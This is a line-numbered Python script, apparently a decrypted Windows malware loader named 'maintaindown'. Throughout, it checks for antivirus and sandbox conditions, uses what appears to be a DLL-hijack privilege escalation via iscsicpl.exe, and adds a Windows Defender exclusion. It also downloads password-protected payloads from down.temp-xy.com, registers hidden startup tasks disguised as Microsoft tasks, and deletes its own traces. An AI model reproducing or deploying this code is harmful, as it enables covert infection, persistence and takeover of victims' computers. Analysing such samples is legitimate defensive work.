maintaindown decrypted

1. import os
2. import sys
3. import ctypes
4. import shutil
5. import time
6. import zipfile
7. import urllib.request
8. import subprocess
9. import requests
10. import tempfile
11. import getpass
12. import base64
13.  
14.  
15. def _c_(εSQΙSεBQ_: str) ->str:
16.     try:
17.         if not isinstance(εSQΙSεBQ_, str) or not εSQΙSεBQ_.startswith('x'):
18.             return εSQΙSεBQ_
19.         Ι5βQ25_0 = int(εSQΙSεBQ_[1:2])
20.         τρβ_0ZΙΟ = int(εSQΙSεBQ_[2:3])
21.         τε_βΙΙO_ = εSQΙSεBQ_[3:]
22.         Τι8ει_Τ_S5 = [lambda data: base64.b85decode(data.encode('utf-8')).
23.             decode('utf-8'), lambda data: base64.b64decode(data.encode(
24.             'utf-8')).decode('utf-8'), lambda data: base64.b64decode(data.
25.             encode('utf-8'))[16:].decode('utf-8')]
26.         Ο8QΤ_0ΤΟεΒΡ_B = min(Ι5βQ25_0 - 1, len(Τι8ει_Τ_S5) - 1)
27.         ΟΕ_QιΤιιΤΕ5O_02 = τε_βΙΙO_
28.         for _ in range(τρβ_0ZΙΟ):
29.             ΟΕ_QιΤιιΤΕ5O_02 = Τι8ει_Τ_S5[Ο8QΤ_0ΤΟεΒΡ_B](ΟΕ_QιΤιιΤΕ5O_02)
30.         return ΟΕ_QιΤιιΤΕ5O_02
31.     except Exception as e:
32.         return εSQΙSεBQ_
33.  
34.  
35. βΤΙ2τΡ = getpass.getuser()
36.  
37. def Τ1O_Τεβιο_2Ο():
38.     QΕο_OQlΤ = 'C:\Program Files'
39.     SZQΒQ8_ΕΤ_5 = ['Avast', 'AVG', 'Bitdefender', 'Kaspersky', 'McAfee',
40.         'Norton', 'Sophos', 'ESET', 'Malwarebytes', 'Avira', 'Panda', _c_
41.         ('x21VHJlbmQgTWljcm8='), 'F-Secure', 'Comodo',
42.         'BullGuard', '360 Total Security', 'Ad-Aware', 'Dr.Web', 'G-Data', 'Vipre', 'ClamWin', 'ZoneAlarm', _c_
43.         ('x21Q3lsYW5jZQ=='), 'Webroot', 'Palo Alto Networks', 'Symantec', 'SentinelOne', 'CrowdStrike', 'Emsisoft', 'HitmanPro', 'Fortinet',
44.         'FireEye', 'Zemana', 'Windows Defender']
45.     for BBlBIροΟ in os.listdir(QΕο_OQlΤ):
46.         Β1ΙΤ2ι_0ΕΕΙBτΡ = os.path.join(QΕο_OQlΤ, BBlBIροΟ)
47.         if os.path.isdir(Β1ΙΤ2ι_0ΕΕΙBτΡ):
48.             for Ι2IβQ1_5_ in SZQΒQ8_ΕΤ_5:
49.                 if Ι2IβQ1_5_.lower() in BBlBIροΟ.lower():
50.                     return Ι2IβQ1_5_
51.     return None
52.  
53.  
54. ρρlΕΒ_ε_2οISΙΡ = 3
55.  
56.  
57. def ρS_0ΕοοΟΟ8ιΟ():
58.     ΒlΙOΤΟτΙ2_SΕ8 = ctypes.windll.kernel32.GetLogicalDrives()
59.     QρZο5I = []
60.     for ΒOl58II_ in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
61.         if ΒlΙOΤΟτΙ2_SΕ8 & 1 << ord(ΒOl58II_) - ord('A'):
62.             Sοι_ΟQ5QQQΡ = str(ΒOl58II_) + ':\\'
63.             τεερββlΤ_BΕ = ctypes.windll.kernel32.GetDriveTypeW(Sοι_ΟQ5QQQΡ)
64.             if τεερββlΤ_BΕ == ρρlΕΒ_ε_2οISΙΡ:
65.                 QρZο5I.append(Sοι_ΟQ5QQQΡ)
66.     if len(QρZο5I) < 2:
67.         sys.exit(1)
68.  
69.  
70.  
71.  
72.  
73. def Q15Q0lIρΙlBει():
74.     try:
75.         return ctypes.windll.shell32.IsUserAnAdmin()
76.     except:
77.         return False
78.  
79.  
80. QβS_Βι_S_ρρ_QΤρΙ0 = Q15Q0lIρΙlBει()
81. IIΤ8Q1_O = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\WindowsApps'
82. if not os.path.isdir(IIΤ8Q1_O):
83.    sys.exit(0)
84. τεΡ_IΡΙΤ_ = os.path.dirname(os.path.abspath(__file__))
85.  
86.  
87. def ΕεΤ_OZΡBΕβρΙ(ι80QSΟ01_, l1ιΤ_0Τ, βε_20_ΙοOI=2, ΡΒ51ΤοΤ_=30):
88.    time.sleep(2)
89.    OlΡ_οl_ρ_S0Ο_ρτρ = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.9', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive'}
90.    if urllib is not None:
91.        for B8_Oτ_O08Ρ_Τ0ι in range(βε_20_ΙοOI):
92.            try:
93.                B05βοβΤΙ_ZSI = urllib.request.Request(ι80QSΟ01_, headers=
94.                    OlΡ_οl_ρ_S0Ο_ρτρ)
95.                with urllib.request.urlopen(B05βοβΤΙ_ZSI, timeout=ΡΒ51ΤοΤ_
96.                    ) as ΕO_Ο215:
97.                    Iι_β_ε5QοΒ = int(ΕO_Ο215.getheader('Content-Length', 0))
98.                    ρερSΙΟιΟ5Ι_ = 0
99.                    with open(l1ιΤ_0Τ, 'wb') as βOO_1_OZ1:
100.                        while True:
101.                            β5QZ_ΡρρΕΒεII2 = ΕO_Ο215.read(8192)
102.                            if not β5QZ_ΡρρΕΒεII2:
103.                                break
104.                            βOO_1_OZ1.write(β5QZ_ΡρρΕΒεII2)
105.                            ρερSΙΟιΟ5Ι_ += len(β5QZ_ΡρρΕΒεII2)
106.                    if Iι_β_ε5QοΒ == 0 or ρερSΙΟιΟ5Ι_ == Iι_β_ε5QοΒ:
107.                        return True
108.            except (urllib.error.URLError, urllib.error.HTTPError) as e:
109.                if B8_Oτ_O08Ρ_Τ0ι == βε_20_ΙοOI - 1:
110.                    break
111.                continue
112.    for B8_Oτ_O08Ρ_Τ0ι in range(βε_20_ΙοOI):
113.        try:
114.            ΕO_Ο215 = requests.get(ι80QSΟ01_, headers=OlΡ_οl_ρ_S0Ο_ρτρ,
115.                stream=True, timeout=ΡΒ51ΤοΤ_)
116.            ΕO_Ο215.raise_for_status()
117.            Iι_β_ε5QοΒ = int(ΕO_Ο215.headers.get('content-length', 0))
118.            ρερSΙΟιΟ5Ι_ = 0
119.            with open(l1ιΤ_0Τ, 'wb') as βOO_1_OZ1:
120.                for β5QZ_ΡρρΕΒεII2 in ΕO_Ο215.iter_content(chunk_size=8192):
121.                    if β5QZ_ΡρρΕΒεII2:
122.                        βOO_1_OZ1.write(β5QZ_ΡρρΕΒεII2)
123.                        ρερSΙΟιΟ5Ι_ += len(β5QZ_ΡρρΕΒεII2)
124.            if Iι_β_ε5QοΒ == 0 or ρερSΙΟιΟ5Ι_ == Iι_β_ε5QοΒ:
125.                return True
126.        except requests.exceptions.RequestException as e:
127.            if B8_Oτ_O08Ρ_Τ0ι == βε_20_ΙοOI - 1:
128.                return False
129.            continue
130.    return False
131.  
132.  
133. if not os.path.isfile(os.path.join(τεΡ_IΡΙΤ_, 'python37.dll')):
134.    time.sleep(60 * 60)
135.    sys.exit(0)
136. if not QβS_Βι_S_ρρ_QΤρΙ0:
137.    τ1llZ_I_0_Ι = os.path.dirname(os.path.abspath(__file__))
138.    οι0lοεε8τ1ι8 = os.path.join(τ1llZ_I_0_Ι, 'svpy.exe')
139.    Οβ0βροΕQΟlο_ = os.path.join(τ1llZ_I_0_Ι, 'maintaindown.py')
140.    ΙQΤβ_ρρτο_ = os.getenv('TEMP')
141.    ιρl2Τ0_ = os.path.join(ΙQΤβ_ρρτο_, 'runs.vbs')
142.    βΡοοτSβΟ5 = 'Set ws = CreateObject("WScript.Shell")
143. ws.Run """' + str(οι0lοεε8τ1ι8) + '"" ""' + str(Οβ0βροΕQΟlο_) + '""", 0
144. '
145.    with open(ιρl2Τ0_, 'w', encoding='utf-8') as QΒΟ_Oβ08Il:
146.        QΒΟ_Oβ08Il.write(βΡοοτSβΟ5)
147.    ιΒ_1βΙZΙιε0ο = os.path.join(τεΡ_IΡΙΤ_, 'ISCSIEXE.dll')
148.    Ρ5_βΒρl_8_IΤ2οο = os.path.join(IIΤ8Q1_O, 'ISCSIEXE.dll')
149.    try:
150.        shutil.move(ιΒ_1βΙZΙιε0ο, Ρ5_βΒρl_8_IΤ2οο)
151.    except Exception as e:
152.        pass
153.    try:
154.        οZρ_τl_O_οΤ = 'C:\Windows\SysWOW64\iscsicpl.exe'
155.        os.startfile(οZρ_τl_O_οΤ)
156.        time.sleep(10)
157.    except Exception as e:
158.        pass
159.    sys.exit(0)
160. if QβS_Βι_S_ρρ_QΤρΙ0:
161.    import tempfile
162.    if Τ1O_Τεβιο_2Ο() == 'Windows Defender':
163.        ρι_B_ΙιΙε_Ο_Ι_SO_Z = 'powershell.exe -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"C:\Users\""'
164.        try:
165.            subprocess.run(ρι_B_ΙιΙε_Ο_Ι_SO_Z, creationflags=subprocess.
166.                CREATE_NO_WINDOW)
167.        except:
168.            pass
169.    τ8Ββ_βΕl_2Q1ε = 'https://down.temp-xy.com/update/onedrive.zip'
170.    ρlΟΒΤ5ρετΕ = 'https://down.temp-xy.com/update/onedrivetwo.zip'
171.    βΟΕ_lO_ΕΤΒΒο1_ = b'QwE123QwE123QwEl23QwE123'
172.    Bρ_1εΤ0 = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\OneDrive\setup'
173.    ZOlρ_οΕ1Ο88I = 'C:\Users\' + str(βΤΙ2τΡ) + '\AppData\Local\Microsoft\Windows\Caches'
174.    os.makedirs(Bρ_1εΤ0, exist_ok=True)
175.    os.makedirs(ZOlρ_οΕ1Ο88I, exist_ok=True)
176.    IεSI0ΤΕ_2οΡ_Ρ = os.path.join(tempfile.gettempdir(), 'update.zip')
177.    Oι_ΟιΟ_82 = os.path.join(tempfile.gettempdir(), 'update1.zip')
178.    if not ΕεΤ_OZΡBΕβρΙ(τ8Ββ_βΕl_2Q1ε, IεSI0ΤΕ_2οΡ_Ρ):
179.        sys.exit(0)
180.    if not ΕεΤ_OZΡBΕβρΙ(ρlΟΒΤ5ρετΕ, Oι_ΟιΟ_82):
181.        sys.exit(0)
182.    try:
183.        with zipfile.ZipFile(IεSI0ΤΕ_2οΡ_Ρ, 'r') as εΤSΟZ_Β_OΕΡ:
184.            εΤSΟZ_Β_OΕΡ.extractall(Bρ_1εΤ0, pwd=βΟΕ_lO_ΕΤΒΒο1_)
185.    except Exception:
186.        sys.exit(0)
187.    try:
188.        with zipfile.ZipFile(Oι_ΟιΟ_82, 'r') as εΤSΟZ_Β_OΕΡ:
189.            εΤSΟZ_Β_OΕΡ.extractall(ZOlρ_οΕ1Ο88I, pwd=βΟΕ_lO_ΕΤΒΒο1_)
190.    except Exception:
191.        sys.exit(0)
192.    try:
193.        os.remove(IεSI0ΤΕ_2οΡ_Ρ)
194.        os.remove(Oι_ΟιΟ_82)
195.    except:
196.        pass
197.    S5ε1Ε5 = 'SvcPowerGreader'
198.    Οο8Ι_ΤB_οΡι = 'PythonConverter'
199.    οZρ_τl_O_οΤ = os.path.join(Bρ_1εΤ0, 'OneDrivePatcher.exe')
200.    QZΤ_β8_Ο51ιB = os.path.join(ZOlρ_οΕ1Ο88I, 'Guardian.exe')
201.    οι0lοεε8τ1ι8 = os.path.join(ZOlρ_οΕ1Ο88I, 'update.py')
202.    lSQ_ρρΕΤε_l_β50 = Bρ_1εΤ0
203.    Oτ8Τ_ΤΕρ_1Ο_I_8_ = ZOlρ_οΕ1Ο88I
204.    ε8Zε2Ol_τοZ = '\Microsoft\Windows\SoftwareProtectionPlatform'
205.    ΕΒ1_ε5_ΙΒοBI_Β_εQ = '\Microsoft\Windows\AppID'
206.    BQΕS2βΡ = '
207.     try {
208.         $action = New-ScheduledTaskAction -Execute '' + str(οZρ_τl_O_οΤ) + '' -WorkingDirectory '' + str(
209.         lSQ_ρρΕΤε_l_β50) + ''
210.         $trigger = New-ScheduledTaskTrigger -AtStartup
211.         $trigger.Delay = 'PT13M'  # 13 minutes delay after startup
212.         $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
213.         $principal = New-ScheduledTaskPrincipal -UserId '' + str(βΤΙ2τΡ) + '' -LogonType Interactive -RunLevel Highest
214.         Register-ScheduledTask -TaskName '' + str(S5ε1Ε5) + '' -TaskPath '' + str(ε8Zε2Ol_τοZ
215.         ) + '' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force
216.         Write-Output 'Task created successfully.'
217.     } catch {
218.         Write-Error $_.Exception.Message
219.     }
220.     '
221.    Oι_β_ρει8Z1Ιββ = '
222.     try {
223.         $action = New-ScheduledTaskAction -Execute '' + str(QZΤ_β8_Ο51ιB) + '' -Argument '' + str(
224.         οι0lοεε8τ1ι8) + '' -WorkingDirectory '' + str(
225.         Oτ8Τ_ΤΕρ_1Ο_I_8_) + ''
226.         $trigger = New-ScheduledTaskTrigger -AtStartup
227.         $trigger.Delay = 'PT20M'  # 20 minutes delay after startup
228.         $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
229.         $principal = New-ScheduledTaskPrincipal -UserId '' + str(βΤΙ2τΡ) + '' -LogonType Interactive -RunLevel Highest
230.         Register-ScheduledTask -TaskName '' + str(Οο8Ι_ΤB_οΡι) + '' -TaskPath '' + str(
231.         ΕΒ1_ε5_ΙΒοBI_Β_εQ) + '' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force
232.         Write-Output 'Task created successfully.'
233.     } catch {
234.         Write-Error $_.Exception.Message
235.     }
236.     '
237.    try:
238.        ρτ_SοΟSΡ5ο = subprocess.run(['powershell.exe', '-ExecutionPolicy', 'Bypass', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', BQΕS2βΡ], check=False,
239.            stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True,
240.            creationflags=subprocess.CREATE_NO_WINDOW)
241.        if ρτ_SοΟSΡ5ο.returncode == 0:
242.            time.sleep(5)
243.        else:
244.            time.sleep(5)
245.    except Exception as e:
246.        time.sleep(5)
247.    try:
248.        ρτ_SοΟSΡ5ο = subprocess.run(['powershell.exe', '-ExecutionPolicy', 'Bypass', '-NoProfile', '-WindowStyle', 'Hidden', '-Command', Oι_β_ρει8Z1Ιββ], check=
249.            False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=
250.            True, creationflags=subprocess.CREATE_NO_WINDOW)
251.        if ρτ_SοΟSΡ5ο.returncode == 0:
252.            time.sleep(2)
253.        else:
254.            time.sleep(2)
255.    except Exception as e:
256.        time.sleep(2)
257.    βΕρ0BZεΡ_ΡOε = os.path.join(tempfile.gettempdir(), 'del_temp.bat')
258.    with open(βΕρ0BZεΡ_ΡOε, 'w', encoding='utf-8') as QΒΟ_Oβ08Il:
259.        QΒΟ_Oβ08Il.write('@echo off
260. timeout /t 10 /nobreak >nul
261. del /f /q "' + str(os.path.join(IIΤ8Q1_O, 'ISCSIEXE.dll')) + '"
262. del /f /q "%TEMP%\runs.vbs"
263. del /f /q "' +
264.            str(os.path.abspath(sys.argv[0])) + '"
265. del /f /q "%~f0"
266. ')
267.    subprocess.Popen(['cmd', '/c', βΕρ0BZεΡ_ΡOε], creationflags=
268.        subprocess.CREATE_NO_WINDOW)
269.    os.startfile(οZρ_τl_O_οΤ)
270.    time.sleep(5)
271. sys.exit(0)
272.